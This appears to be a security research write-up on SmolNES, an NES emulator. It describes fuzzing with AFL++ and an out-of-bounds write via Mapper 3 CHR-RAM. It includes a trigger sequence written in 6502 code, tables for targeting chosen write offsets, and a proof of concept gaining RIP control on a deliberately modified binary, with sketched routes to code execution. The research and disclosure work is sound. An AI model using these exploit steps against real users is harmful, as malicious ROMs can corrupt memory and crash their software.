Vulnerability Research on SmolNES

The SmolNES emulator contains multiple memory safety vulnerabilities, including an Out-Of-Bounds Write via Mapper 3 (CHR-RAM) that leads to arbitrary memory corruption when loading a malicious ROM.

In practice, only availability is definitively impacted: a malicious ROM can trigger a reproducible crash. In SmolNES’s memory layout, the GOT and the heap are out of reach, and no exploitable function pointer exists within the range reachable by the overflow.

That said, it makes for an excellent case study, directly transferable to more critical targets with a favorable memory layout: section 9 demonstrates RIP control in a modified binary built to simulate that scenario.


  1. Background and target selection
  2. Setting up the fuzzing environment
  3. First results: initial crashes
  4. Lead 1: OOB Read in PRG-ROM (abandoned)
  5. Source code analysis
  6. Fuzzing iterations and optimizations
  7. Discovering the real vulnerability
  8. Memory mapping and exploitation attempt
  9. PoC on modified binary: RIP control
  10. Responsible Disclosure and CVE
  11. Appendix: Required NES concepts
  12. Resources

1. Background and target selection

SmolNES GitHub page, 776 stars and 3 contributors

The source code is available on GitHub (binji/smolnes).

SmolNES is a NES (Nintendo Entertainment System) emulator written in intentionally compact “golfed” C; the readable version, deobfuscated.c, is roughly 700 lines long. A few characteristics make it an ideal target:

  • Trivially AFL-fuzzable interface: the program takes a single .nes ROM as its argument (./smolnes <rom.nes>), so the files AFL++ generates can be passed to smolnes directly.
  • Small codebase: the developer explicitly prioritized compactness (the tagline is “NES emulator in <5000 bytes of C”), which almost certainly means bounds checking was skipped.
  • Hidden complexity: the NES is a complex machine (6502 CPU, PPU, Mapper system). It would be surprising if a project like this, with no security focus, had no bugs.
  • Few maintainers: the project has only 3 contributors, so it’s unlikely that any vulnerability research has been done on it before.

The main attack surface identified right away is the iNES file header (the first 16 bytes of a ROM), which configures critical parameters such as memory bank sizes, mapper type, and graphics mode.


2. Setting up the fuzzing environment

The SmolNES source includes two versions:

  • smolnes.c: the official “golfed” version (unreadable)
  • deobfuscated.c: a readable version with explanatory comments; this is the one I used for research

Two modifications are made to deobfuscated.c before compiling for fuzzing:

  1. Removing SDL calls (Simple DirectMedia Layer, the graphics/audio library): SDL initialization, window creation, rendering, and event polling are commented out. Without this, the program would try to open a window on every execution, making fuzzing too slow to be viable.

  2. Capping the CPU cycle count: a limit is added to the main loop. Without this, a valid ROM would run the emulator forever.

The instrumented binary is built with the provided Makefile, overriding the compiler through the CC environment variable:

CC=afl-clang-lto make

afl-clang-lto (Link-Time Optimization) is AFL++’s highest-performance compiler mode: it inserts instrumentation at link time, yielding better coverage and throughput than the other instrumentation modes such as afl-clang-fast.

Free-to-use NES ROMs from the EmuDeck homebrew repository are used as the initial corpus. AFL++ will mutate them automatically to explore new execution paths.

afl-fuzz -i games/ -o output_dir/ -- ./smolnes_instru/deobfuscated @@
AFL++ TUI iteration 1: exec speed ~1500/sec, stability 100%, first crashes

The metrics are promising:

  • ~1500 execs/sec: removing SDL was a success
  • stability 100%: the emulator is deterministic, which is essential for effective fuzzing

AFL++ finds its first crashes quickly. Within minutes, 3 unique crash files are saved in output_dir/default/crashes/. After this initial burst, no new unique crashes appear, even after dozens more minutes of fuzzing.

sig:11 (SIGSEGV) is present on all crashes, indicating an invalid memory access.


4. Lead 1: OOB Read in PRG-ROM (abandoned)

The first crash is loaded into GDB for analysis.

GDB crash OOB Read: fatal instruction movzx, $rax=0x3ffffc
→ movzx r15d, BYTE PTR [rax+rcx*1+0x10]
; deobfuscated.c:234 : return rom[(prg[hi - 8 >> prgbits - 12] & ...) << prgbits | ...]
; mem(lo=0xfc, hi=0xf, val=0x0, write=0x0), reason: SIGSEGV

This corresponds to the following code:

// deobfuscated.c
return rom[(prg[hi - 8 >> prgbits - 12] & (rombuf[4] << 14 - prgbits) - 1)
               << prgbits |
           addr & (1 << prgbits) - 1];

The emulator attempts to read at index 4,194,300 in rom[], a buffer with a maximum size of 1 MB: this is an Out-Of-Bounds Read.

Root cause: rombuf[4] (5th byte of the iNES header, number of PRG banks) was set to 0x00 by AFL. The emulator then initializes:

prg[1] = rombuf[4] - 1;
// If rombuf[4] == 0: 0 - 1 wraps around to 255 once stored in the 8-bit prg[1]

The PRG-ROM read computation becomes prg[1] * 0x4000 + offset = 255 * 0x4000 + 0x3FFC = 0x3FFFFC, which is exactly the $rax value observed.
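The arithmetic can be double-checked with a small Python model of the PRG read formula. This is only a sketch: it assumes prgbits = 14 (16 KB windows, the value implied by the 0x4000 multiplier above), and the function name prg_rom_index is mine, not something found in SmolNES.

```python
def prg_rom_index(addr, prg, prg_banks, prgbits=14):
    """Model of the index SmolNES computes for a PRG-ROM read.

    addr      : 16-bit CPU address in $8000-$FFFF
    prg       : bank numbers, one per (1 << prgbits)-byte window
    prg_banks : iNES header byte 4 (rombuf[4])
    prgbits   : assumed to be 14 here (16 KB windows)
    """
    hi = addr >> 12                               # top nibble, as after `hi >>= 4`
    window = (hi - 8) >> (prgbits - 12)           # which PRG window is addressed
    mask = (prg_banks << (14 - prgbits)) - 1      # becomes -1 (all ones) when prg_banks == 0
    bank = prg[window] & mask
    return (bank << prgbits) | (addr & ((1 << prgbits) - 1))

# Header byte 4 set to 0: prg[1] = (0 - 1) truncated to 8 bits = 255
prg = [0, (0 - 1) & 0xFF]
index = prg_rom_index(0xFFFC, prg, prg_banks=0)
print(hex(index), index)                          # 0x3ffffc 4194300

# A well-formed single-bank ROM stays inside the first 16 KB
print(hex(prg_rom_index(0xFFFC, [0, 0], prg_banks=1)))
```

The first call reproduces the $rax value seen in GDB; the second shows the same read landing at 0x3ffc for a valid one-bank ROM.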

Why this lead is abandoned: this crash happens at the very start of execution, during the Reset Vector read (the game’s first instruction). It causes an immediate crash (DoS), but there is no control over the value read or the target address. Additionally, this bug blocks AFL: nearly every mutation generates this same immediate crash, the emulator never actually starts, and AFL cannot explore the deeper execution paths that are of interest.


5. Source code analysis

Before optimizing the fuzzer, the code has to be understood well enough to target the right execution paths. This is a good moment to read the appendix covering the NES architectural concepts, as things get fairly dense from here.

The code is built around a single large main function that contains the emulator’s main loop, plus a few helper functions.

// deobfuscated.c
SDL_RWread(SDL_RWFromFile(argv[1], "rb"), rombuf, 1024 * 1024, 1);
// The full ROM file is loaded into rombuf[1024*1024]
rom = rombuf + 16;       // Game code starts after the 16-byte header
prg[1] = rombuf[4] - 1;  // Index of the last PRG bank (header byte 4)
// Header byte 5: number of CHR-ROM banks in the file
// If 0: the game has no CHR-ROM, it uses CHR-RAM (8 KB of RAM)
//   rombuf[5] != 0 -> CHR-ROM mode: chrrom points into the file
//   rombuf[5] == 0 -> CHR-RAM mode: chrrom = chrram[8192]
chrrom = rombuf[5] ? rom + (rombuf[4] << 14) : chrram;

chrrom is the base pointer for graphics data access. Its value (either pointing into the ROM file or into chrram) is the pivot of the vulnerability.

// deobfuscated.c
uint8_t *get_chr_byte(uint16_t a) {
  return &chrrom[chr[a >> chrbits] << chrbits | a % (1 << chrbits)];
}

The parameter a is a 14-bit VRAM address (value between 0 and 16383), representing a position in the PPU’s graphics address space. The variable V plays this role during an access from $2007.

The formula is compact. With chrbits = 12, a >> chrbits extracts bit 12 of a, the top bit of a 13-bit pattern-table address, and uses it as an index into chr[]. In standard CHR-RAM mode, a is bounded to $0000-$1FFF (8192 values) before the call, so a >> 12 can only be 0 or 1, selecting one of the two 4 KB windows. It is the bank number stored in chr[a >> 12] that can exceed 1 (the heart of the vulnerability). The << chrbits shift turns that bank number into the bank’s base offset, and the modulo recovers the offset within the bank:

// Equivalent readable version (with chrbits = 12, bank size = 4096 bytes):
uint8_t *get_chr_byte_readable(uint16_t a) {
  uint8_t bank_index = chr[a >> 12];      // bits 12-15 of 'a' -> bank number
  uint32_t bank_base = bank_index << 12;  // bank_index * 4096
  uint16_t offset = a & 0xFFF;            // bits 0-11 of 'a' -> offset within bank
  return &chrrom[bank_base + offset];
}

chr[] is an array of graphics bank indices, updated by the Mappers. In CHR-RAM mode, chrrom == chrram and chrram is only 8192 bytes (2 banks of 4096). If bank_index >= 2, then bank_base >= 8192, and the returned pointer goes past the end of chrram.
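To make the bounds problem concrete, here is a minimal Python model of the same computation. It assumes chrbits = 12 as in the walkthrough; chr_offset and is_oob_in_chrram are illustrative names that do not exist in SmolNES.

```python
CHRRAM_SIZE = 8192
CHRBITS = 12  # 4 KB banks, as assumed in the walkthrough

def chr_offset(a, chr_banks, chrbits=CHRBITS):
    """Offset from chrrom computed by get_chr_byte(a)."""
    return (chr_banks[a >> chrbits] << chrbits) | (a % (1 << chrbits))

def is_oob_in_chrram(a, chr_banks):
    """True when the access lands past the end of the 8 KB chrram array."""
    return chr_offset(a, chr_banks) >= CHRRAM_SIZE

identity = [0, 1]   # default mapping: both banks inside chrram
switched = [2, 3]   # bank pair selected by a Mapper write

for a in (0x0000, 0x0FFF, 0x1000, 0x1FFF):
    print(hex(a), chr_offset(a, identity), chr_offset(a, switched),
          is_oob_in_chrram(a, switched))
```

With the identity mapping every offset stays within 0..8191; with the switched pair, the very first address already maps to offset 8192.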

mem() emulates all 6502 CPU memory accesses. It takes the address (hi:lo), the value to write (val), and the operation direction (write).

// deobfuscated.c (excerpt)
uint8_t mem(uint8_t lo, uint8_t hi, uint8_t val, uint8_t write) {
  uint16_t addr = hi << 8 | lo;
  switch (hi >>= 4) { // Divide hi by 16 to get the memory "region"
  case 0: case 1: // Region $0000-$1FFF: internal RAM (2 KB, mirrored over 8 KB)
    // The NES physically has only 2 KB of RAM ($0000-$07FF). The remaining 6 KB
    // ($0800-$1FFF) are mirrors: accessing $0800 or $0000 reads the same physical byte.
    return write ? ram[addr] = val : ram[addr];
  case 2: case 3: // Region $2000-$3FFF: PPU registers (mirrored)
    // The 8 PPU registers ($2000-$2007) are mirrored across the entire $2000-$3FFF range.
    // lo &= 7 keeps only the 3 low bits, mapping any address in this range to its
    // corresponding PPU register.
    // Ex: $2015 -> 0x15 & 7 = 5 -> register $2005 (ppuscroll).
    lo &= 7;
    if (lo == 7) { // Register $2007 = PPUDATA (PPU data port)
      // PPUDATA reads are delayed by one access: reading $2007 does not immediately
      // return the value at address V, but the value fetched by the previous read,
      // stored in ppubuf. The current read is buffered for the next access.
      // Exception: the palette ($3F00+) is returned without buffering.
      // That's why tmp = ppubuf at the start and return tmp at the end.
      tmp = ppubuf;
      uint8_t *rom =
          // If V points into the Pattern Table area (0x0000-0x1FFF):
          V < 8192 ? write && chrrom != chrram
                         ? &tmp            // Write to CHR-ROM: ignore
                                           // (tmp serves as a bit bucket; CHR-ROM
                                           // is read-only on real hardware)
                         : get_chr_byte(V) // Write to CHR-RAM or any read
          // If V points into the Nametable area (0x2000-0x3EFF):
          : V < 16128 ? get_nametable_byte(V)
          // Otherwise: Palette area (0x3F00+)
                      : palette_ram + (uint8_t)((V & 19) == 16 ? V ^ 16 : V);
      write ? *rom = val : (ppubuf = *rom); // Actual write or read
      V += ppuctrl & 4 ? 32 : 1; // V auto-increments after each $2007 access
      V %= 16384; // V stays within the PPU address space (14 bits = 2^14 = 16384)
      return tmp;
    }
    // ... handling of other PPU registers ($2000 ppuctrl, $2006 ppuaddr, etc.)
  case 4: // Region $4000-$4FFF: APU and I/O registers
    // $4016: joypad read (keyboard state in the emulator)
    for (tmp = 0, hi = 8; hi--;)
      tmp = tmp * 2 + key_state[...]; // key_state = pointer to keyboard state
  case 6: case 7: // Region $6000-$7FFF: PRG-RAM (optional cartridge RAM)
    // Two distinct memories, two distinct roles:
    // - Internal RAM ($0000-$1FFF): 2 KB soldered on the motherboard. Game variables,
    //   6502 stack. Present on every NES.
    // - PRG-RAM ($6000-$7FFF): optional 8 KB ON the cartridge. Absent from most games.
    //   When present, often battery-backed to save progress (Zelda, Metroid).
    addr &= 8191; // Keep the 13 low bits (0x1FFF) to address prgram[8192]
    return write ? prgram[addr] = val : prgram[addr];
  default: // Region $8000-$FFFF: ROM + Mapper handling
    // IMPORTANT: writes to the ROM region do not modify the ROM.
    // They are intercepted and interpreted as commands to the Mapper.
    if (write)
      switch (rombuf[6] >> 4) { // Mapper number
      case 7: // Mapper 7 (AxROM)
        // ...
      case 4: // Mapper 4 (MMC3)
        // ...
      case 3: // Mapper 3 (CNROM): CHR bank switching only
        chr[0] = val % 4 * 2; // Even bank (0, 2, 4, or 6)
        chr[1] = chr[0] + 1;  // Next odd bank (1, 3, 5, or 7)
        break;
      case 2: // Mapper 2 (UNROM)
        // ...
      case 1: // Mapper 1 (MMC1)
        // ...
      }
    return rom[(prg[hi - 8 >> prgbits - 12] & (rombuf[4] << 14 - prgbits) - 1)
                   << prgbits |
               addr & (1 << prgbits) - 1];
  }
  return ~0;
}

Key points identified for the vulnerability:

  1. Register $2007 (PPUDATA): this is the PPU’s data port. Writing to $2007 from 6502 code triggers a VRAM write, whose destination is computed by get_chr_byte(V). V is the PPU’s internal address cursor, controlled by writes to $2006 (PPUADDR).

  2. Mapper 3: any write anywhere in $8000-$FFFF modifies chr[0] without bounds checking. With val=0x01 (or any val such that val % 4 == 1), chr[0] = 0x01 % 4 * 2 = 2.

  3. The partial safety check: write && chrrom != chrram ? &tmp : get_chr_byte(V). If chrrom == chrram (CHR-RAM mode), the write goes through get_chr_byte with no bounds check on the bank index. This is the only case where a pattern-table write can go out of bounds.


6. Fuzzing iterations and optimizations

Iteration 1: SDL removal + cycle cap (result: 3 crashes, then stall)

The first harness version simply removes SDL graphics calls and adds a cycle limit. AFL++ quickly finds 3 unique crashes (all related to the OOB Read in PRG-ROM described in section 4), then stalls.

Reason for the stall: the emulator crashes too early. When rombuf[4]=0, the NES CPU never really starts: it reads the Reset Vector through an invalid bank index, roughly 4 MB into a 1 MB buffer, and crashes immediately. AFL cannot explore the deeper execution paths (like the 6502 code that writes to $2007).

Iteration 2: header patches + ASAN + 6502 dictionary

Knowing the code better, several additional modifications are made.

Header patches in the harness (applied after reading the file):

// Prevent PRG underflow and the immediate $FFFC crash
if (rombuf[4] == 0 || rombuf[4] > 64) rombuf[4] = 1;
// Force CHR-RAM mode: chrrom = chrram, which activates the path through get_chr_byte()
rombuf[5] = 0;
// Force Mapper 3 (CNROM), preserve the mirroring bit
rombuf[6] = (rombuf[6] & 0x01) | 0x30;

These three patches steer AFL toward the vulnerable path:

  • rombuf[4] clamped: prevents the immediate PRG crash
  • rombuf[5] = 0: ensures chrrom == chrram, a necessary condition for the OOB Write
  • rombuf[6] = 0x3X: forces Mapper 3, enabling CHR bank switching without bounds checking

Note on rombuf[4] > 64: the value is capped at 64 banks. This limit matches the size of rombuf (1 MB / 16 KB per bank = 64 banks); beyond that, index calculations would exceed the allocated megabyte. This is not an official NES limit (real NES ROMs have at most 32 PRG banks); it’s a safety bound derived from the buffer size.
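The same three patches can be mirrored in Python, for instance to normalise seed files before handing them to the fuzzer. This is a sketch of the logic only: the real patches live in the C harness, and patch_ines_header is a hypothetical helper.

```python
def patch_ines_header(rom: bytearray) -> bytearray:
    """Apply the three harness patches to an in-memory ROM image."""
    if rom[4] == 0 or rom[4] > 64:
        rom[4] = 1                       # avoid the PRG underflow and oversized bank counts
    rom[5] = 0                           # force CHR-RAM mode (chrrom == chrram)
    rom[6] = (rom[6] & 0x01) | 0x30      # force Mapper 3, keep the mirroring bit
    return rom

# 16-byte header: 0 PRG banks, 2 CHR banks, mapper 4 with vertical mirroring
sample = bytearray(b"NES\x1a" + bytes([0x00, 0x02, 0x41]) + bytes(9))
patched = patch_ines_header(sample)
print(patched[4], patched[5], hex(patched[6]))   # 1 0 0x31
```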

Compiling with ASAN:

AFL_USE_ASAN=1 CC=afl-clang-lto make

Without ASAN, an OOB Write silently corrupts adjacent memory without an immediate crash as long as the overwritten region is mapped and writable. ASAN detects the out-of-bounds access at the very first overflowed byte, making the crash systematic.

The trade-off is a performance drop: ~300 execs/sec instead of ~1500. Further optimizations could improve this, but it wasn’t necessary given that enough crashes were found at this reduced speed.

AFL++ dictionary (nes6502.dict):

# iNES header
magic="NES\x1a"
mapper3="\x30"
# 6502 write opcodes
op_sta_abs="\x8D"
op_stx_abs="\x8E"
# NES register addresses (little-endian)
# $2006: PPUADDR
ppu_addr="\x06\x20"
# $2007: PPUDATA
ppu_data="\x07\x20"
# $8000: Mapper 3 register
mapper_reg="\x00\x80"
#...
# The actual dictionary I used was considerably larger

Without the dictionary, AFL has to stumble upon the sequence 8D 07 20 (STA $2007) by chance among 16,777,216 possible 3-byte combinations. With the dictionary, it inserts it directly.

Surface bug hotfixes:

Two additional bugs were identified and hotfixed in the harness to let ASAN reach the target bug:

  • OOB Write in palette_ram: the index (uint8_t)(...) can be up to 255, but palette_ram is only 64 bytes. Hotfix: & 63 to clamp the index.
  • OOB Read in PRG-ROM: the computed index in the PRG formula can exceed 1 MB. Hotfix: add a bounds check before the return.

Both bugs are real (confirmed on legitimate, unmodified ROMs), but of lesser interest: the first is a write with a limited range (~191 bytes maximum), the second is a read with no control over the value returned.
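The palette figures can be reproduced by enumerating every V in the palette area. The snippet below is a sketch that models only the index expression from mem(); palette_index is an illustrative name.

```python
PALETTE_RAM_SIZE = 64

def palette_index(v):
    """Index into palette_ram for a PPU address V in $3F00-$3FFF."""
    idx = (v ^ 16) if (v & 19) == 16 else v   # mirror the $3F10-style entries
    return idx & 0xFF                          # the (uint8_t) cast

indices = [palette_index(v) for v in range(0x3F00, 0x4000)]
worst = max(indices)
print("highest index:", worst)
print("distance past the end:", worst - PALETTE_RAM_SIZE)
print("highest index with & 63:", max(i & 63 for i in indices))
```

The highest index is 255, i.e. 191 bytes past the end of the 64-byte array, and the & 63 hotfix brings every access back in range.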

Result: AFL++ finds the CHR-RAM OOB Write crash very quickly.

AFL++ TUI iteration 2: CHR-RAM OOB Write crash found with ASAN + dictionary + header patches

7. Discovering the real vulnerability: OOB Write via Mapper 3 CHR-RAM

With the patched binary (ASAN + forced Mapper 3 + forced CHR-RAM), AFL++ produces a new type of crash. Replayed under GDB with ASAN, it reveals:

ASAN: global-buffer-overflow WRITE 0 bytes after chrram
==ERROR: AddressSanitizer: global-buffer-overflow
WRITE of size 1 at 0x55555628c9a0 thread T0
#0 in mem deobfuscated.c:92
0x55555628c9a0 is located 0 bytes after global variable 'chrram' (size 8192)

Unlike the previous crashes (READ), this one is a WRITE. It lands exactly at chrram[8192], the first byte past the end of the array.

The stack trace (#0) points to line 92 of mem():

write ? *rom = val : (ppubuf = *rom); // line 92

Here, rom is the pointer returned by get_chr_byte(V), whose value has gone past the bounds of chrram. ASAN interrupts execution at the exact moment of the write.

Root cause: get_chr_byte() without bounds checking

In CHR-RAM mode (chrrom == chrram, from rombuf[5] = 0) with Mapper 3 active (rombuf[6] >> 4 == 3), any CPU write to $8000-$FFFF modifies the CHR banks:

case 3: // mapper 3
  chr[0] = val % 4 * 2;
  chr[1] = chr[0] + 1;
  break;

val is entirely controlled by the ROM. The possible values of chr[0] and their consequences:

val written   chr[0]   base offset into chrram   out-of-bounds?   OOB range
val%4 = 0     0        0                         no               -
val%4 = 1     2        8192                      yes              +4095 B
val%4 = 2     4        16384                     yes              +12287 B
val%4 = 3     6        24576                     yes              +20479 B

There is no check that chr[0] stays within the physical bounds of chrram.

Three conditions, all satisfiable by a malicious ROM:

  1. rombuf[5] == 0 (iNES header byte 5, controlled by the ROM): enables CHR-RAM mode
  2. rombuf[6] >> 4 == 3 (high nibble of header byte 6, controlled by the ROM): enables Mapper 3
  3. The 6502 code writes to $2007 with V in $0000-$1FFF after a Mapper write that set chr[0] >= 2

The target address is fully derivable from two controllable parameters:

address = &chrram[ chr[V >> 12] * 4096 + (V & 0xFFF) ]
  • val written to $8000+: determines chr[0] (0, 2, 4, or 6)
  • V: positioned by two consecutive writes to $2006

Granularity is one byte. The written value (from the 6502’s A, X, or Y register) is also controlled by the ROM.
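Going the other way, from a desired offset to the two parameters, is a simple division. The helper below is a sketch with a made-up name (plan_write); it only uses the chr[0] window and leaves out the odd banks that could be reached through chr[1] with V in $1000-$1FFF.

```python
BANK_SIZE = 4096

def plan_write(target_offset):
    """Return (val, V) such that a $2007 write lands at chrram[target_offset].

    val is the byte to store anywhere in $8000-$FFFF (Mapper 3 register),
    V is the PPU address to load through two writes to $2006.
    """
    bank, intra = divmod(target_offset, BANK_SIZE)
    if bank not in (0, 2, 4, 6):
        raise ValueError(f"bank {bank} is not selectable through chr[0]")
    return bank // 2, intra

for offset in (8192, 16384 + 0x878, 24576 + 4095):
    val, v = plan_write(offset)
    print(f"offset {offset}: val=${val:02X}, V=${v:04X}")
```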

The following sequence triggers an OOB Write at the first byte after chrram. iNES header: 1 PRG bank (rombuf[4] = 1), 0 CHR banks (rombuf[5] = 0), Mapper 3 (rombuf[6] = 0x30).

; Entry point (Reset Vector at $FFFC points here)
; Step 1: select the CHR bank via Mapper 3
; val=1 => chr[0] = 1%4*2 = 2 => base offset = 2*4096 = 8192 (first OOB byte)
LDA #$01 ; $A9 $01
STA $8000 ; $8D $00 $80 -> Mapper 3: chr[0]=2, chr[1]=3
; Step 2: set V via two consecutive writes to $2006
LDA #$00 ; $A9 $00
STA $2006 ; $8D $06 $20 (high byte: $00)
LDA #$00 ; $A9 $00
STA $2006 ; $8D $06 $20 (low byte: $00) => V = $0000
; Step 3: write via $2007 (PPUDATA)
; get_chr_byte($0000) = &chrram[2*4096 + 0] = &chrram[8192] -> OOB
LDA #$41 ; $A9 $41 (value to write)
STA $2007 ; $8D $07 $20 -> WRITE to chrram[8192]
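For reference, here is one way the sequence above could be packed into a .nes file. This is a minimal sketch, not the script used for the article: it places the code at the start of the single PRG bank, points the Reset Vector at $C000 (the window that prg[1] maps to bank 0 for a one-bank ROM), and appends a JMP-to-self that is not part of the listing so the CPU has something to execute afterwards.

```python
def build_trigger_rom():
    """Assemble a one-bank, Mapper 3, CHR-RAM ROM containing the sequence above."""
    code = bytes([
        0xA9, 0x01, 0x8D, 0x00, 0x80,   # LDA #$01 ; STA $8000  (chr[0] = 2)
        0xA9, 0x00, 0x8D, 0x06, 0x20,   # LDA #$00 ; STA $2006  (V high byte)
        0xA9, 0x00, 0x8D, 0x06, 0x20,   # LDA #$00 ; STA $2006  (V low byte)
        0xA9, 0x41, 0x8D, 0x07, 0x20,   # LDA #$41 ; STA $2007  (OOB write)
        0x4C, 0x14, 0xC0,               # JMP $C014: spin in place (added for this sketch)
    ])
    prg = bytearray(0x4000)             # one 16 KB PRG bank
    prg[:len(code)] = code
    prg[0x3FFC:0x3FFE] = (0xC000).to_bytes(2, "little")    # Reset Vector -> $C000
    header = b"NES\x1a" + bytes([1, 0, 0x30]) + bytes(9)   # 1 PRG bank, CHR-RAM, Mapper 3
    return header + bytes(prg)

rom = build_trigger_rom()
print(len(rom), rom[:8].hex())
```

Writing rom to a file (the name is up to you) and passing it to the ASAN build should be enough to see whether the report matches the one above.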

To target a different offset:

target (offset from start of chrram)   val at $8000      V via $2006
8192 + N (N < 4096)                    $01 (chr[0]=2)    $0000-$0FFF
16384 + N (N < 4096)                   $02 (chr[0]=4)    $0000-$0FFF
24576 + N (N < 4096)                   $03 (chr[0]=6)    $0000-$0FFF

8. Memory mapping and exploitation attempt

GDB: addresses of global variables in the .bss section

The order of global variables in memory (.bss section, confirmed via GDB on the release binary):

0x55555567a220 chrram [8192 bytes] <- start of the overflow region
0x55555567c220 ram [8192 bytes]
0x55555567e220 palette_ram [64 bytes]
0x55555567e260 vram [2048 bytes]
0x55555567ea60 ptb_lo [1 byte]
0x55555567ea70 addr_lo [1 byte]
0x55555567ea80 prg [4 bytes]
0x55555567ea90 rom [8 bytes] (pointer)
...

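Maximum overflow range with Mapper 3 through chr[0]: chr[0] max = 6, so the highest reachable offset is 6 * 4096 + 4095 = 28671 bytes from the start of chrram, i.e. ~20 KB out-of-bounds. (With V in $1000-$1FFF the access goes through chr[1] = 7 instead, which adds another 4 KB of reach.)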

The natural first target for an OOB Write is the GOT (Global Offset Table), which holds the addresses of libc functions. Overwriting a GOT entry redirects a function call to arbitrary code.

GDB: GOT located before the .bss section, out of reach
gef➤ p/d 0x555555559fc0 - 0x55555567a220 # GOT - chrram
$5 = -1180256 # Negative value (~-1.1 MB)

The GOT is located approximately 1.1 MB before chrram in memory. Since the OOB Write can only reach addresses at positive offsets from chrram, the GOT is inaccessible.
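The reachability argument boils down to an offset comparison. The sketch below uses the addresses from this particular GDB session (they change from run to run under ASLR, but the relative offsets within the binary do not) and the chr[0]-based maximum reach computed earlier; reachable is an illustrative helper.

```python
CHRRAM = 0x55555567A220          # from the .bss listing above
CHRRAM_SIZE = 8192
MAX_REACH = 6 * 4096 + 4095      # highest chrram offset reachable through chr[0]

def reachable(addr):
    """True if addr lies in the out-of-bounds window past chrram."""
    offset = addr - CHRRAM
    return CHRRAM_SIZE <= offset <= MAX_REACH

targets = {
    "GOT": 0x555555559FC0,
    "ram": 0x55555567C220,
    "rom pointer": 0x55555567EA90,
}
for name, addr in targets.items():
    print(f"{name:12} offset {addr - CHRRAM:>9} reachable={reachable(addr)}")
```

The GOT comes out at offset -1180256 and is rejected, while ram (offset 8192) and the rom pointer (offset 18544) fall inside the window.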

The heap (dynamically allocated by SDL at startup) is another potential target: it may contain function pointers or exploitable allocator metadata.

Distance chrram -> heap start: 0x23e749f0 ~ 574 MB

As expected, ASLR places the heap several hundred megabytes away from the .bss section. The maximum OOB range (~20 KB with Mapper 3) is nowhere near that distance.

In the ~20 KB reachable after chrram, the variables present are integer arrays (ram, palette_ram, vram) and scalars (ptb_lo, addr_lo, 6502 registers, prg). Overwriting them disrupts emulation but provides no useful primitive: no function pointer is present in this region.

One variable stands out, though: the rom pointer, located ~18 KB after chrram. It points to the start of the PRG data inside rombuf and is used for offset calculations. Overwriting it would change the base for address arithmetic, potentially enabling access to arbitrary memory, but it would also change where the emulated CPU fetches its instructions from. The primitive therefore self-destructs on first use.

  • Guaranteed DoS: reproducible crash with a malicious .nes ROM, confirmed via ASAN
  • Memory corruption: up to ~20 KB of global variables can be overwritten, disrupting emulation arbitrarily
  • Direct RCE: not achievable with this memory layout (GOT and heap out of reach, no function pointer in the reachable region)

9. PoC on modified binary: RIP control

SmolNES’s memory layout contains no function pointer within the overflow’s reach. To illustrate the vulnerability’s potential in a favorable scenario, a function pointer is manually added to deobfuscated.c’s source, in the .bss section immediately after chrram. This pointer does not exist in the original binary. A malicious ROM overwrites it with 0xdeadbeef, giving control of RIP (the instruction pointer register on x86_64) on the next call.

The modification touches the Makefile and deobfuscated.c and adds two new files, poc_hook.h and poc_hook.c. The function pointer is defined in a separate compilation unit (poc_hook.c) so that the linker places its .bss after that of deobfuscated.o, and therefore at a higher address than chrram.

poc_hook.h:

typedef void (*render_hook_t)(void);
extern render_hook_t render_hook;

poc_hook.c:

typedef void (*render_hook_t)(void);
render_hook_t render_hook;

Full diff:

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -18,8 +18,8 @@
-deobfuscated: deobfuscated.c
- $(CC) -O2 -o $@ $< ${SDLFLAGS} -g ${WARN}
+deobfuscated: deobfuscated.c poc_hook.c
+ $(CC) -O2 -o $@ deobfuscated.c poc_hook.c ${SDLFLAGS} -g ${WARN}
diff --git a/deobfuscated.c b/deobfuscated.c
--- a/deobfuscated.c
+++ b/deobfuscated.c
@@ -1,5 +1,6 @@
#include <SDL2/SDL.h>
#include <stdint.h>
+#include "poc_hook.h"
@@ -691,6 +691,8 @@
SDL_RenderPresent(renderer);
+ // [POC] Call render hook if defined
+ if (render_hook) render_hook();
// Handle SDL events.

Two points to note:

  • Makefile: poc_hook.c is added as an explicit source after deobfuscated.c. The linker lays out poc_hook.o’s .bss after deobfuscated.o’s, so render_hook ends up at a higher address than the variables in deobfuscated.c, including chrram (the resulting offset is measured in GDB).
  • Call site: the hook is called after each SDL_RenderPresent, i.e. once per frame (scanline 241). That’s the natural moment for an emulator to expose this kind of callback.

This pattern is realistic: many emulators expose such callbacks for debugging tools, save states, or GUI frontends.

The ROM is generated by the make_poc_rom.py script (see Resources). It takes the offset of render_hook from chrram in the target binary’s .bss, then writes 0xdeadbeef as an 8-byte little-endian value via successive writes to $2007, with V incrementing by 1 each time (auto-increment after each PPUDATA access).
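The write plan itself is easy to visualise. The sketch below is not make_poc_rom.py; it only lists which byte goes to which V for the hook offset quoted in that script (18552), assuming ppuctrl bit 2 is clear so that V advances by 1.

```python
import struct

def hook_write_plan(target_addr, hook_offset):
    """Return (chr[0] bank, [(V, byte), ...]) for overwriting an 8-byte pointer."""
    bank, intra = divmod(hook_offset, 4096)
    payload = struct.pack("<Q", target_addr)       # 8 bytes, little-endian
    # V advances by 1 after each $2007 access when ppuctrl bit 2 is clear
    return bank, [(intra + i, b) for i, b in enumerate(payload)]

bank, writes = hook_write_plan(0xDEADBEEF, 18552)
print("chr[0] =", bank)
for v, b in writes:
    print(f"V=${v:04X} <- ${b:02X}")
```

The low four bytes come out as EF BE AD DE, followed by four zero bytes that clear the upper half of the pointer.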

GDB showing RIP = 0xdeadbeef

RIP is controlled. The emulator jumped to the address supplied by the malicious ROM.

Controlling RIP is not enough to execute arbitrary code on a modern system: ASLR and the NX bit are highly effective mitigations.

Two classic approaches to go further:

Option 1: One-gadget

A “one-gadget” is a gadget in libc that, when called, executes execve("/bin/sh", NULL, NULL) if certain register conditions are met. Pointing render_hook at this gadget would yield a shell without a ROP chain, given a libc address leak is available to bypass ASLR. In a real-world context, the end goal is usually not a local shell but persistence or remote access; the one-gadget remains a valid tool, it’s the post-exploitation action that changes.

Option 2: Stack pivot into rombuf

The real alternative is a stack pivot: find a gadget that places rsp (the stack pointer) into a memory region whose contents we control. rombuf is a 1 MB array (fully controlled by the malicious ROM) located in .bss. A gadget of the form mov rsp, [address_in_bss] ; ret would pivot the stack into rombuf and allow executing an arbitrary ROP chain, leading to code execution. This scenario is reinforced by the fact that rom is a global pointer (in .bss) that already points into rombuf: a gadget dereferencing this known address is enough to place rsp in the controlled region.


10. Responsible Disclosure and CVE

